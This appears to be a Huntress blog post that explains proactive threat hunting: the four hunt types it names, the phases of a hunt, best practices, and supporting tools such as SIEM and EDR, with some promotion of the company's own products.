In a world where cyber threats evolve at an insanely fast pace, relying solely on reactive measures is no longer enough. Enter threat hunting—a proactive approach utilizing threat intelligence, alerts, and log data—or even technical experience—to create and define hypotheses that can be tested to find unknown threats, security gaps, and potential zero-days.
As cyber threats become more sophisticated, threat hunting empowers businesses to seek out and neutralize threats before they can cause significant harm.
Threat hunting is the process of proactively searching through networks and endpoints to identify signs of malicious activity that have evaded traditional security defenses. Unlike conventional security measures, which often rely on alerts triggered by known threats or vulnerabilities, threat hunting involves asking critical questions and testing hypotheses about potential threats based on observed behaviors or patterns.
As we’ve seen threat actors work around the clock to cause trouble, we’ve also seen threat hunting become a more popular practice in recent years. If you think about it, attackers have the first-move advantage in most scenarios—their victims aren’t even aware of their presence until it’s too late. Threat hunting aims to solve that problem. Threat hunting is all about being proactive—it combines technical and behavioral analysis to help businesses stay ahead of the latest threats and catch them before they can do greater damage.
Dwell times have always been a point of issue. Threat actors can sneak into an environment unnoticed and maintain persistence for months or even years. Thanks to the wider adoption of detection and response technology, that window has shrunk considerably—in 2023, the global median dwell time dropped to 10 days, down from 16 days in 2022. That’s progress, but 10 days is still more than enough for adversaries to do real damage. Mandiant red teams report that they typically need only five to seven days to achieve their objectives. It’s in this gap between adversary speed and detection technology where proactive threat hunting becomes critical.
Everyone has their own approach or way of thinking about things, and that goes for researchers too. For myself, I like to think there are four types of hunts: intelligence-driven, data-driven, knowledge-driven, and, of course, hybrid hunts.
Intelligence-driven hunts consist of collecting and analyzing intel from various sources in order to execute the hunt mission. Intel can consist of file names, hashes, IPs, campaigns, IOCs, email addresses, domains, etc. Using the collected intelligence, we can create hypotheses that we can test against our data sources.
Data-driven hunts rely on internal data that could potentially indicate malicious behavior. The types of data we could use for data-driven hunts are low-priority alerts and detections and aggregated analytical data. This data does not give us our “smoking gun,” nor does it mean anything bad is happening at all, but it gives us a good starting point to create hypotheses on what we are seeing.
Knowledge-driven hunts rely on our knowledge of available data sets, client networks, and adversary tactics, techniques, and procedures (TTPs). Knowing adversary TTPs lets us know how to look for malicious behavior. Using frameworks like MITRE ATT&CK, we can create hypotheses based on threat actor TTPs that have been seen in the wild.
Hybrid hunts combine two or more types of hunts that could help us create hypotheses with a narrower scope. For example, if data shows certain events happening on endpoints and intel suggests that these events could be part of a campaign that adversaries are conducting, we can create a hypothesis that combines data-driven and intelligence-driven hunt methods.
The hunt is initiated by identifying a trigger—this may come from alerts generated by security tools such as SIEM systems, or from abnormal network behaviors.
The next phase involves deep investigations to analyze the gathered data, leveraging analytics and potentially machine learning tools for pattern recognition and anomaly detection.
Finally, the findings must be acted upon. This can involve patching vulnerabilities, updating security policies, or removing malicious artifacts from the network.
Know Your Environment: Understanding what "normal" looks like in your network facilitates the identification of anomalies that signal threats.
Utilize Threat Intelligence: Incorporate data from threat intelligence feeds to enhance your understanding of current threat landscapes.
Engage Continuous Learning: Threat landscapes evolve—regular training and knowledge updates for your threat hunting team (threat hunters) are essential.
The success of any threat hunting program heavily relies on the right tools:
Security Information and Event Management (SIEM): Huntress Managed SIEM puts enterprise-grade SIEM in reach for any threat hunting team. It also centralizes logs and alerts from various sources to monitor potential incidents.
Endpoint Detection and Response (EDR): Get an unfair advantage against threat actors with endpoint protection that focuses on tracking and analyzing activities on endpoints to detect malicious behavior.
Threat Intelligence Platforms (TIPs): Aggregate threat data from diverse sources—valuable for both proactive and reactive measures.
At the end of the day, software can’t match human intelligence. Machine learning and automation have their place, but they still require humans to make the last-minute decision to contain and respond accurately. Plus, modern threat actors are intelligent and know how to exploit those blind spots. They’ve got entire teams that spend their days identifying ways to abuse, exploit, or slip past IT security tools. How can you expect to beat that with automation alone?
We need hunters at the forefront. A threat hunter with a well-trained eye is more likely to pick up on TTPs and suspicious activity and can actually help software-based tools be more accurate. Overall, threat hunting enables security teams to identify unknown threats and catch them before they cause major damage and disruption. It’s this proactive protection against the unknown that makes threat hunting unique and incredibly important to cybersecurity today.
Want to dive deeper into what threat hunting looks like? Check out our video series, Behind the Hunt, to explore the world of threat hunting and security research from the defender's point of view.
Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.
